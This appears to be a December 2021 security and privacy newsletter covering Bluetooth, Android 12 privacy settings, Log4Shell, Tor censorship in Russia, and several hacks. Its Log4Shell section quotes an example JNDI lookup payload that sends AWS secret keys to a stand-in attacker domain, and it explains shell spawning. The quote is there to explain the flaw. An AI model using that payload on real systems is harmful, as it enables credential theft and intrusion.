Let it Snow with the IT Privacy and Security Weekly Update for December 14th 2021


In a year when holiday parties are giving more than anyone bargained for in the form of new covid variants, colds, flu, and a whole range of bacterium that we had deftly sidestepped for the better part of the last 18 months, we have lot’s of healthy updates for you.

We start them with the V-POTUS and end with 2022 trends.

In between, we touch on Androids, Canadians, and Apaches before discovering Tor blocking and that secret bottle message you threw out to sea.

For the holidays we also have a couple of ideas that might help with stocking stuffers. png-clipart-creative-christmas-snowman small

So, wrap the gift and tie that bow! To the very best in IT Privacy and Security we go!

US: Kamala Harris Is Right About Bluetooth

Last Monday, Politico led its West Wing Playbook newsletter with a report that Vice President Kamala Harris is “Bluetooth-phobic,” and “insists on using wired headphones,” because of the risks associated with the decades-old wireless standard. It’s presented as a misguided quirk, but … she’s actually right!

Wired headphones are safer. Bluetooth connections can be exploited. A Bluetooth connection can be hacked, allowing cybercriminals to take control of the device.

They can even put malware or spyware on your device to spy on you.
Bluetooth has been used by cybersecurity researchers to exploit security flaws in some phones. They then extracted data, including business credentials, from the system.

According to many academics and other journalists, Harris’ fears about the security hazards posed by Bluetooth technology were well-founded.

Given the political and security risks, Harris is probably wise to turn off her Bluetooth connection. A person’s vulnerability is proportional to the value of their data.

Those who retain their business and personal data on the same device, however, should use caution.

So what’s the upshot for you? You got it from the Veep. If you aren’t using your Bluetooth, turn it off!

Global: New Android 12 Privacy Settings

Android 12 introduced a privacy dashboard to help increase permissions transparency. This shows which apps have accessed the sensors on your phone in the last 24 hours and allows you to deny them further access. It’s a straightforward way to see which apps are doing what on your phone. Go to Settings > Privacy and then open up Privacy Dashboard.

When an Android app is using your phone’s microphone or camera, a small green dot will appear in the top menu bar, similar to a feature Apple added in last year’s iOS 14 release. Swiping down from the top corner of the screen opens the Quick Settings menu, where you can turn the app’s camera and microphone access off instantly. While that block is temporary, you can enter the individual app’s permissions from here and make the change permanent.

Your phone has its own advertising ID that allows apps to link data to your device—building up a profile of you and your interests—so it can then show you personalized ads based on this information.: You can now alter your settings to reset the string of numbers identifying you to a series of zeros and stop third parties from linking any information to your device in this way.

So what’s the upshot for you? Perhaps the two biggest things you can do to protect your device, data, and accounts—regardless of what operating system you’re on—are ensuring you’re using a password manager to create and store unique logins for every account you use and making sure multifactor authentication is turned on wherever you can.

CA: Canadians cyber attacks have hit Infrastructure the Hardest

Small- and medium-sized businesses accounted for two-thirds of Canadian organizations victimized by cyber hijackers leaking their sensitive data publicly as blackmail to force ransom payments during the period January 1, 2020 to June 30, 2020.

Since March 2020, nearly 25 percent of Canadian small businesses have experienced some type of malware attack. That figure is likely higher than reported, officials said.

In Canada, the estimated average cost of a data breach, a compromise that includes but is not limited to ransomware, is C$6.35M.

By the Centre’s figures, the global average total cost of recovery from a ransomware incident (the cost of paying the ransom and/or remediating the compromised network) more than doubled to C$2.3 million in 2021 from C$970,722 in 2020. Worldwide, while known ransom payments increased from 2019 to 2020, the demand amounts appear to have stabilized at roughly $200,000 in 2021.

So what’s the upshot for you? It’s not just us, the Canadian Royal Mounted Police are dealing with this too!

Global: The log4j (Log4Shell) Update

The log4j (Log4Shell) Situation

“What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs.

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.
This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input ${env:PWD}, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.
Example: Here’s an example of extracting AWS Keys and listening for incoming requests. ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.SomeOrAnotherDomain.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them. (Good luck)

Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.

Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
The project is maintained by very few people in their spare time for no money, and If the project had a major issue it would disrupt the entire Internet. We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint. This is not their fault. They’re heroes for keeping the lights on… “

Here is why this risk is so unique:

  • It is a remotely exploitable vulnerability, which gives an attacker privileged access to and possibly even full control of the compromised system. As the sample exploit code highlights, it’s extremely easy to exploit and can happen over a ton of different attack vectors. Unlike most vulnerabilities, which require very specific conditions to be met, Log4Shell is as broad as they get.
  • Log4j is pervasive. It’s all over our infrastructure —- and ubiquitously used in all manner of applications. In infrastructure, you can find it and fix it if you are diligent. If you’re using applications that are developed using Log4j, you have to wait for updates from those vendors before you can fix your systems and use them safely. Simply put, we will be living with this problem for a long time.
  • Log4j exploits run in Java. Let that sink in for a moment. What it means is that it’s the perfect payload, portable across industrial heavy equipment, network servers, down to printers, and even your kid’s Raspberry Pi.
  • Systems don’t have to be Internet-facing or accessible to be compromised. Consider web or email or systems, which might log activity and then periodically ship those logs internally for processing and analysis on an internal logging server. Boom, you’re internal systems are compromised

So what’s the upshot for you? Forbes’ Amit Yoran sums it up like this: "Now, as frequently happens, just about every security vendor will sweep in with their aggressively worded marketing spin, “If you buy our product and deploy it, you would have been/will be safe.” Let me be clear. No single product that I’ve come across in the entirety of my career will, in fact, keep you fully safe from this issue. No next-gen firewall, no web application firewall, no endpoint detection and response, no identity management solution, no
operational technology product, or anything else will stop Log4Shell. "

Global: Inside Web3: Why crypto fans are going wild over a blockchain-based internet idea

There are a few fundamental differences between web2 and web3, but decentralization is at its core. Web3 enhances the internet as we know it today with a few other added characteristics. web3 is:

  • Verifiable
  • Trustless
  • Self-governing
  • Permissionless
  • Distributed and robust
  • Stateful
  • Native built-in payments

In web3, developers don’t usually build and deploy applications that run on a single server or that store their data in a single database (usually hosted on and managed by a single cloud provider).

Instead, web3 applications either run on blockchains, decentralized networks of many peer-to-peer nodes (servers), or a combination of the two that forms a crypto-economic protocol. These apps are often referred to as dapps (decentralized apps), and you will see that term used often in the web3 space.

To achieve a stable and secure decentralized network, network participants (developers) are incentivized and compete to provide the highest quality services to anyone using the service.

When you hear about web3, you’ll notice that cryptocurrency is often part of the conversation. This is because cryptocurrency plays a big role in many of these protocols. It provides a financial incentive (tokens) for anyone who wants to participate in creating, governing, contributing to, or improving one of the projects themselves.

So what’s the upshot for you? Twitter is already exploring ways to add Web3 features to its app. Yet scaling the infrastructure needed for the fully-fledged version could take decades. Even the largest blockchains are currently too small to handle all transactions that happen on Web2. Web3’s best-case scenario could be existing alongside Big Tech platforms — not replacing them.

US/CN: Inside Tim Cook’s Secret $275 Billion Deal with Chinese Authorities

Apple’s iPhone recently became the top-selling smartphone in China, its second-biggest market after the U.S., for the first time in six years. But the company owes much of that success to CEO Tim Cook, who laid the foundation years ago by secretly signing an agreement, estimated to be worth more than $275 billion, with Chinese officials promising Apple would do its part to develop China’s economy and technological prowess through investments, business deals, and worker training.

Cook forged the five-year agreement, which hasn’t been previously reported, during the first of a series of in-person visits he made to the country in 2016 to quash a sudden burst of regulatory actions against Apple’s business, according to internal Apple documents viewed by The Information.

Before the meetings, Apple executives were scrambling to salvage the company’s relationship with Chinese officials, who believed the company wasn’t contributing enough to the local economy, the documents show. Amid the government crackdown and the bad publicity that accompanied it, iPhone sales plummeted.

So what’s the upshot for you? A 1,250-word Memorandum of Understanding (MOU) between Apple and China’s National Development and Reform Commission reportedly runs for 5 years and accounted for $275 Billion in spending and the agreement includes a request Apple reportedly received in 2014 or 2015 about a small group of uninhabited islands that China and Japan apparently have a dispute over in terms of who owns them.

Going by either the Senkaku Islands or the Diaoyu Islands, depending on which side of the argument you’re taking, they inspired a request from China to members of the Maps team to make them appear larger, even when viewers are zoomed out on the map.

According to The Information, not only did Apple eventually make the change, but even today, for viewers using its map from within China, the islands are still shown at a larger scale than the territories around them.

Global: 90% of all bitcoins have now been mined - but the remaining 10% will take over 100 years to reach open market

As of Monday, 90% of all bitcoins have been mined, according to data from Blockchain.com, 12 years after miners acquired the first-ever bitcoins.

That means about 18.9 million coins out of the maximum supply of 21 million are now on the open market. But mining the final 10% isn’t expected to happen until February 2140, based on network estimates and bitcoin halving schedules, CoinDesk reported.
Bitcoin halving - which happens approximately every four years - is when the number of new bitcoins entering circulation shrinks.
The halving process will continue to make mining more challenging. Right now, miners receive about 6.25 bitcoin for every mined block, but this will drop by half in 2024.
Meanwhile, an estimated 20% of bitcoin has been “lost,” meaning they can’t be retrieved. So it remains unlikely the open market ever sees a full 21 million coins in circulation.

So what’s the upshot for you? Some might consider this BTC dip as the perfect opportunity for a few more stocking stuffers…

US: Aging medical devices open up healthcare to cyberattacks

Age can be a major vulnerability in medical devices. Some can have lifespans of decades, during which time software can go out of date and the companies may stop releasing patches to strengthen their security.

“If Microsoft has terminated patches and updates for Windows after 10 years in existence, who is going to patch or how are we going to manage that device, which has got another 10 to 15 years of life?” Veetil said. “The hospitals find it unjustifiable to change the device, it is a major capital investment.”

One of the most effective weapons in a healthcare system’s cyber defense strategy is asset management — the process of keeping track of every IT-related device across an organization and assessing potential gaps in security such as outdated software.

Different pieces of a healthcare organization’s IT landscape may have been added or removed over decades, meaning it can be difficult for a new IT manager to get to grips with the vast system.

It is unlikely a cyber adversary will hack a device in order to intentionally interfere with a patient’s insulin dose or pacemaker, said Mac McMillan, CEO, and co-founder of cybersecurity consulting firm CynergisTek Inc. Injuring or killing somebody by hacking their medical device will attract far more attention from law enforcement, for minimal gain.

Hackers are more likely to see greater benefit in disruptive attacks such as using a medical device as a jumping-off point to breach the company’s network, McMillan said. Through this method of attack, criminals are able to extort more money from a health system by holding onto patient data or disrupting internet systems than they would by intentionally hurting people.

So what’s the upshot for you? This is an all too evident malaise as healthcare providers become easy targets for miscreants. Your local hospital isn’t running Windows 7 because it wants to, it’s because budgeting has put saving lives over tech refreshes. Now, it seems that tech refreshes could be saving lives.

US: Russia’s Internet Censorship Machine Is Going After Tor

At the start of December, the Tor Project’s support email inbox began receiving an unusual number of messages from users saying they were encountering problems accessing the digital anonymity service. “It was not just one or two, but like 10 people asking,” says Gustavo Gus, community team lead of the Tor Project. At the same time, staff at the Open Observatory of Network Interference, which measures and tracks internet censorship, saw indications that suggested Russian internet service providers (ISPs) were blocking the Tor network.

What happened at the start of December, though those in the Tor Project didn’t know it yet, was significant. Roskomnadzor, the Russian media, and telecommunications regulator had issued a demand to ISPs around Russia to block users’ access to Tor’s website. In Russia’s world of decentralized internet infrastructure, ISPs began taking action speedily. And access to parts of the Tor network itself was limited.

The situation was messy, but it all added up to one conclusion: Something was up. “We realized on December 2 or 3 that Tor was being blocked,” says Gus. The Tor Project began contacting reliable contacts in Russia and those outside the country to understand more. Slowly, the project began putting together the pieces of the puzzle, identifying what was going on. The final piece slotted into place on December 6, when the project received an email purporting to be from Roskomnadzor, saying that the Tor Project domain would be blocked. “At first, some of us thought it was a spam email,” admits Gus. “We didn’t think it was a real communication from the government.”

But it was. Torproject.org had been added to Roskomnadzor’s blocked list.

So what’s the upshot for you? Perhaps this goes some way in helping us understand last week’s article on the large numbers of mysterious unidentified TOR nodes that surface and disappear after handling large percentages of Tor traffic.

Global: Chinese cyberattack almost shut off power for 3M Australians

Chinese hackers came within minutes of shutting off power to three million Australian homes but were thwarted at the final hurdle.

A successful attack would knock out power to between 1.4 and 3 million homes with no way of knowing how long it might take to regain control of the generators.

CS Energy quickly realized the cyber attackers were trying to bypass their internal corporate systems to access the generators that circulate 3,500MW of electricity into the grid.

IT specialists came up with a brilliant last-minute move to stop Beijing from gaining access, by separating the company’s corporate and operational computer systems.

Once the network was essentially cut in half, hackers had no way of seizing control of the generators.

Sources with knowledge of the hack attempt said the cyber-attackers were less than 30 minutes away from shutting down power.

So what’s the upshot for you? Recently Microsoft announced it ‘disrupted the activities of a China-based hacking group that we call Nickel’ which carried out attacks in the US and 28 other countries.

‘We believe these attacks were largely being used for intelligence gathering from government agencies, think tanks, and human rights organizations,’ the software giant said.

Last month China targeted Indian utilities and infrastructure sites with cyber-attacks also trying to shut down a coal-fired power plant.

Taiwanese officials said their small democratic nation just 180km off the coast of China receives up to ‘five million attacks a day’ with the vast majority likely to be directed by Beijing.

We see a pattern here.

BR: Brazil health ministry website hit by hackers, vaccination data targeted

Brazil’s government delayed new pandemic-related requirements for travelers entering the country after a hack of its health ministry early Friday morning.

The agency said on its website that several of its systems had been knocked offline by the attack including those that issue digital vaccine cards and track the country’s national immunization program.

The statement said that the attack had “temporarily compromised some of its systems” and that they were unavailable.

A ransomware gang known as Lapsus$ Group took credit for the attack on Friday, boasting that it stole and deleted about 50 terabytes of data from the ministry of health’s systems.

“Contact us if you want the data back,” the group said in its ransom note, with email and Telegram details.

The agency told reporters on Friday that it has backups of all the data that was deleted by the hackers.

So what’s the upshot for you? If you are traveling and unvaccinated, travel quickly. The 5-day quarantine for unvaccinated visitors is to be postponed for a week while the vaccine data is restored.

Global: Google is building a new augmented reality device and operating system

Google was one of the early leaders in the first wave of modern augmented reality (AR) research and devices, but the company has appeared to cool to AR in recent years even as Apple and Facebook have invested heavily in it. But it looks like that trend will soon be reversed.

On LinkedIn, operating system engineering director Mark Lucovsky announced that he has joined Google. He previously headed up mixed reality operating system work for Meta, and before that he was one of the key architects of Windows NT at Microsoft. “My role is to lead the Operating System team for Augmented Reality at Google,” he wrote.

He also posted a link to some job listings at Google that give the impression Google is getting just as serious about AR as Apple or Meta.

So what’s the upshot for you? Advertised job roles are largely in the United States, but some are located in Waterloo, Ontario—the HQ of Canadian smart glasses maker North, which Google acquired in 2020.
Our question is, “Will anyone find any privacy in the meta with Facebook, Google, and others piling in?”

US: Woman lost @metaverse Instagram handle days after Facebook name change

Thea-Mai Baumann had posted to Instagram using the @metaverse handle for nearly a decade when her account was disabled on November 2.

“Your account has been blocked for pretending to be someone else,” the app told her.

Baumann wasn’t exactly sure what had happened, but the timing was curious. The account block came just days after Facebook had announced its new name, Meta. CEO Mark Zuckerberg said the name reflected the company’s new focus on its vision of the metaverse, a virtual world meant to facilitate commerce, communication, and more. Baumann’s @metaverse handle was suddenly a hot commodity.

"This account is a decade of my life and work. I didn’t want my contribution to the metaverse to be wiped from the internet,” Baumann told The New York Times. “That happens to women in tech, to women of color in tech, all the time.” The Australian had created an app that would display virtual holograms over her company’s fingernail designs. She envisioned making an entire line of clothing and accessories that would be virtually augmented. After five years, funding ran dry and she began to use her Instagram account to promote her other work.

Baumann’s @metaverse account went relatively unnoticed over the years, attracting fewer than 1,000 followers. Then Facebook changed its name. …

So what’s the upshot for you? It’s unclear whether Meta/Facebook had anything to do with Baumann losing access to her account. Baumann attempted to verify her identity with Instagram, but she didn’t receive a reply for weeks. She tried working with an intellectual property attorney to see what rights she had to get her account back, but she couldn’t afford their services.

Once a journalist got wind of the story, though, things changed. On December 4, two days after a New York Times reporter contacted Meta about the account, Baumann suddenly regained access to @metaverse.

UK: All is not right in the house of the high IQ

Mensa - the society for people with high IQs - has paid damages to a former director it accused of being responsible for an embarrassing data leak.

The Mensa website was hacked in January this year, resulting in the theft of personal information from the society’s 18,000 members.

Eugene Hopkinson, a former director, and technology officer at British Mensa, stood down from the society in the wake of the attack, claiming it had failed to properly secure members’ passwords. Lots of members’ personal information was reported to have been published online, including transcripts of online chats and the IQ scores of current and failed applicants.

In the immediate aftermath of the attack, Mensa tried to claim that no personal information had been accessed before acknowledging a breach and then suggesting that “some personal data of our members was deliberately put into the public domain”.

In subsequent communications to its members, Mensa then tried to pin the blame for the breach on Hopkinson, suggesting he was personally involved in the attacks. Hopkinson subsequently sued Mensa for libel.

So what’s the upshot for you? “On the basis of the evidence currently available to us, British Mensa accepts that there is insufficient evidence to reach the criminal standard of proof that Mr. Hopkinson was responsible for either the cyberattack or the subsequent data disclosure.

“Legal action between Mr. Hopkinson and British Mensa Ltd has now been resolved and we will be making no further comment. For commercial reasons, British Mensa’s insurers recommended that the claim was settled out of court.”

Global: It’s not private, I wrote it on a plastic bottle.

You have probably heard about all the plastic garbage that washes out of rivers and into the oceans. You have probably also heard that a plastic island the size of Texas is floating somewhere out in the middle of the Pacific (not actually true, as if it were, you would probably already have real estate developers putting hotels on it or Kevin Costner filming a Waterworld sequel there).

You probably have heard that microplastics are turning up in our water, our air, and even in the virgin snows of the Arctic and Antarctic.

Right now we have no idea what the long-term effect will be on plants, animals, and us, so you may be interested to learn that microbes in oceans and soils across the globe are evolving to eat plastic. The research scanned more than 200m genes found in DNA samples taken from the environment and found 30,000 different enzymes that could degrade 10 different types of plastic.

The study is the first large-scale global assessment of the plastic-degrading potential of bacteria and found that one in four of the organisms analyzed carried a suitable enzyme. The researchers found that the number and type of enzymes they discovered matched the amount and type of plastic pollution in different locations.

The results “provide evidence of a measurable effect of plastic pollution on the global microbial ecology”, the scientists said.

Millions of tonnes of plastic are dumped in the environment every year, and the pollution now pervades the planet, from the summit of Mount Everest to the deepest oceans. Reducing the amount of plastic used is vital, as is the proper collection and treatment of waste.

So what’s the upshot for you? Utilization of synthetic biology approaches to enhance current plastic degradation processes is of crucial importance, as natural plastic degradation processes are very slow. A plastic soda bottle can take almost 50 years to biodegrade, releasing methane into the atmosphere as it degrades.

So yes, message in the bottle or on the bottle, no, no privacy there, it’s going to be around for a long time…

Global: Pinterest Predicts 2022

Thanks to its massive trove of data, Pinterest knows that “tooth gem” searches were up 85% over the past year, and “crystal eye makeup” searches doubled.

The anonymized data is still not being used (at least by Pinterest) for revenue generation, but that could change soon enough.

Pinterest’s trend predictions for next year include pearlcore, dopamine dressing, barkitecture, and lounge-erie (but we didn’t see predictions about next year’s cyber-attacks).

Pinterest said that 80% of its predictions last year ended up #trending this year.
Need gift-giving ideas for the holidays? This might be a good place to look for inspiration.

So what’s the upshot for you? What’s an “interest” now could be a “trend” in a year.

That’s it for this week Damlers! Throw one more log on the fire, well unless you, like us, are getting hit with another highly unseasonable heatwave.

Be kind, stay safe, stay secure, let it snow and see you in se7en! png-clipart-creative-christmas-snowman small

1 Like